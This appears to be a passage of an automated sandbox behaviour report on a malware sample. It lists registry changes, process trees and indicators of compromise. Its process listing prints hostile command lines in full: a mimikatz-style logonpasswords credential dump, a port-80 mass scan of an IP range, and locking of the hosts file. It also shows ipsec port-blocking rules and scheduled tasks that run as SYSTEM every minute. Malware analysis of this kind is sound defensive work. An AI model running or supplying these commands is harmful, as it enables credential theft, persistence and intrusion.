\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hqnaebagm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1760 cmd.exe 924 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000a000000023b8a-6.dat nsis_installer_2 behavioral2/files/0x0018000000023bbf-15.dat nsis_installer_1 behavioral2/files/0x0018000000023bbf-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zghnuwi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" zghnuwi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" zghnuwi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zghnuwi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" zghnuwi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" zghnuwi.exe Key created \REGISTRY\USER\.DEFAULT\Software eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump eqelmsiua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" eqelmsiua.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" zghnuwi.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 924 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4968 schtasks.exe 3976 schtasks.exe 3188 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3216 bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3216 bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe Token: SeDebugPrivilege 264 zghnuwi.exe Token: SeDebugPrivilege 2080 zghnuwi.exe Token: SeDebugPrivilege 2332 vfshost.exe Token: SeDebugPrivilege 2276 eqelmsiua.exe Token: SeLockMemoryPrivilege 924 indtey.exe Token: SeLockMemoryPrivilege 924 indtey.exe Token: SeDebugPrivilege 5004 eqelmsiua.exe Token: SeDebugPrivilege 4224 eqelmsiua.exe Token: SeDebugPrivilege 4544 eqelmsiua.exe Token: SeDebugPrivilege 4944 eqelmsiua.exe Token: SeDebugPrivilege 3764 eqelmsiua.exe Token: SeDebugPrivilege 2752 eqelmsiua.exe Token: SeDebugPrivilege 4392 eqelmsiua.exe Token: SeDebugPrivilege 2472 eqelmsiua.exe Token: SeDebugPrivilege 2260 eqelmsiua.exe Token: SeDebugPrivilege 1204 eqelmsiua.exe Token: SeDebugPrivilege 4592 eqelmsiua.exe Token: SeDebugPrivilege 2500 eqelmsiua.exe Token: SeDebugPrivilege 1196 eqelmsiua.exe Token: SeDebugPrivilege 4144 eqelmsiua.exe Token: SeDebugPrivilege 1468 eqelmsiua.exe Token: SeDebugPrivilege 2200 eqelmsiua.exe Token: SeDebugPrivilege 3544 eqelmsiua.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 3216 bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe 3216 bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe 264 zghnuwi.exe 264 zghnuwi.exe 2080 zghnuwi.exe 2080 zghnuwi.exe 4120 xohudmc.exe 4668 yqiwma.exe 2788 zghnuwi.exe 2788 zghnuwi.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3216 wrote to memory of 1760 3216 bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe 85 PID 3216 wrote to memory of 1760 3216 bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe 85 PID 3216 wrote to memory of 1760 3216 bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe 85 PID 1760 wrote to memory of 924 1760 cmd.exe 88 PID 1760 wrote to memory of 924 1760 cmd.exe 88 PID 1760 wrote to memory of 924 1760 cmd.exe 88 PID 1760 wrote to memory of 264 1760 cmd.exe 90 PID 1760 wrote to memory of 264 1760 cmd.exe 90 PID 1760 wrote to memory of 264 1760 cmd.exe 90 PID 2080 wrote to memory of 3312 2080 zghnuwi.exe 92 PID 2080 wrote to memory of 3312 2080 zghnuwi.exe 92 PID 2080 wrote to memory of 3312 2080 zghnuwi.exe 92 PID 3312 wrote to memory of 1580 3312 cmd.exe 94 PID 3312 wrote to memory of 1580 3312 cmd.exe 94 PID 3312 wrote to memory of 1580 3312 cmd.exe 94 PID 3312 wrote to memory of 5024 3312 cmd.exe 95 PID 3312 wrote to memory of 5024 3312 cmd.exe 95 PID 3312 wrote to memory of 5024 3312 cmd.exe 95 PID 3312 wrote to memory of 4224 3312 cmd.exe 96 PID 3312 wrote to memory of 4224 3312 cmd.exe 96 PID 3312 wrote to memory of 4224 3312 cmd.exe 96 PID 3312 wrote to memory of 1196 3312 cmd.exe 97 PID 3312 wrote to memory of 1196 3312 cmd.exe 97 PID 3312 wrote to memory of 1196 3312 cmd.exe 97 PID 3312 wrote to memory of 2720 3312 cmd.exe 98 PID 3312 wrote to memory of 2720 3312 cmd.exe 98 PID 3312 wrote to memory of 2720 3312 cmd.exe 98 PID 3312 wrote to memory of 1268 3312 cmd.exe 99 PID 3312 wrote to memory of 1268 3312 cmd.exe 99 PID 3312 wrote to memory of 1268 3312 cmd.exe 99 PID 2080 wrote to memory of 1484 2080 zghnuwi.exe 100 PID 2080 wrote to memory of 1484 2080 zghnuwi.exe 100 PID 2080 wrote to memory of 1484 2080 zghnuwi.exe 100 PID 2080 wrote to memory of 3472 2080 zghnuwi.exe 102 PID 2080 wrote to memory of 3472 2080 zghnuwi.exe 102 PID 2080 wrote to memory of 3472 2080 zghnuwi.exe 102 PID 2080 wrote to memory of 2120 2080 zghnuwi.exe 104 PID 2080 wrote to memory of 2120 2080 zghnuwi.exe 104 PID 2080 wrote to memory of 2120 2080 zghnuwi.exe 104 PID 2080 wrote to memory of 2940 2080 zghnuwi.exe 115 PID 2080 wrote to memory of 2940 2080 zghnuwi.exe 115 PID 2080 wrote to memory of 2940 2080 zghnuwi.exe 115 PID 2940 wrote to memory of 3828 2940 cmd.exe 117 PID 2940 wrote to memory of 3828 2940 cmd.exe 117 PID 2940 wrote to memory of 3828 2940 cmd.exe 117 PID 3828 wrote to memory of 4032 3828 wpcap.exe 118 PID 3828 wrote to memory of 4032 3828 wpcap.exe 118 PID 3828 wrote to memory of 4032 3828 wpcap.exe 118 PID 4032 wrote to memory of 2204 4032 net.exe 120 PID 4032 wrote to memory of 2204 4032 net.exe 120 PID 4032 wrote to memory of 2204 4032 net.exe 120 PID 3828 wrote to memory of 2708 3828 wpcap.exe 121 PID 3828 wrote to memory of 2708 3828 wpcap.exe 121 PID 3828 wrote to memory of 2708 3828 wpcap.exe 121 PID 2708 wrote to memory of 2124 2708 net.exe 123 PID 2708 wrote to memory of 2124 2708 net.exe 123 PID 2708 wrote to memory of 2124 2708 net.exe 123 PID 3828 wrote to memory of 556 3828 wpcap.exe 124 PID 3828 wrote to memory of 556 3828 wpcap.exe 124 PID 3828 wrote to memory of 556 3828 wpcap.exe 124 PID 556 wrote to memory of 2064 556 net.exe 126 PID 556 wrote to memory of 2064 556 net.exe 126 PID 556 wrote to memory of 2064 556 net.exe 126 PID 3828 wrote to memory of 324 3828 wpcap.exe 127
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1828
-
C:\Windows\TEMP\vuctsdlau\indtey.exe"C:\Windows\TEMP\vuctsdlau\indtey.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Users\Admin\AppData\Local\Temp\bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe"C:\Users\Admin\AppData\Local\Temp\bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uqrutnuy\zghnuwi.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:924
-
-
C:\Windows\uqrutnuy\zghnuwi.exeC:\Windows\uqrutnuy\zghnuwi.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:264
-
-
-
C:\Windows\uqrutnuy\zghnuwi.exeC:\Windows\uqrutnuy\zghnuwi.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1580
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:5024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4224
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:1268
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1484
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3472
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2120
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bliinatya\rtbnheisb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\bliinatya\rtbnheisb\wpcap.exeC:\Windows\bliinatya\rtbnheisb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:2204
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:2124
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:2064
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2688
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3420
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3384 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1196
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1528
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2728 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3732
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bliinatya\rtbnheisb\igadlieeu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bliinatya\rtbnheisb\Scant.txt2⤵PID:1916
-
C:\Windows\bliinatya\rtbnheisb\igadlieeu.exeC:\Windows\bliinatya\rtbnheisb\igadlieeu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bliinatya\rtbnheisb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bliinatya\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bliinatya\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4208 -
C:\Windows\bliinatya\Corporate\vfshost.exeC:\Windows\bliinatya\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mirluebfi" /ru system /tr "cmd /c C:\Windows\ime\zghnuwi.exe"2⤵PID:3028
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "mirluebfi" /ru system /tr "cmd /c C:\Windows\ime\zghnuwi.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3188
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "glrfuunmi" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uqrutnuy\zghnuwi.exe /p everyone:F"2⤵PID:4484
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "glrfuunmi" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uqrutnuy\zghnuwi.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bguydwsli" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vuctsdlau\indtey.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2876 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bguydwsli" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vuctsdlau\indtey.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4968
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1668
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:528
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1616
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3248
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2680
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4012
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2900
-
-
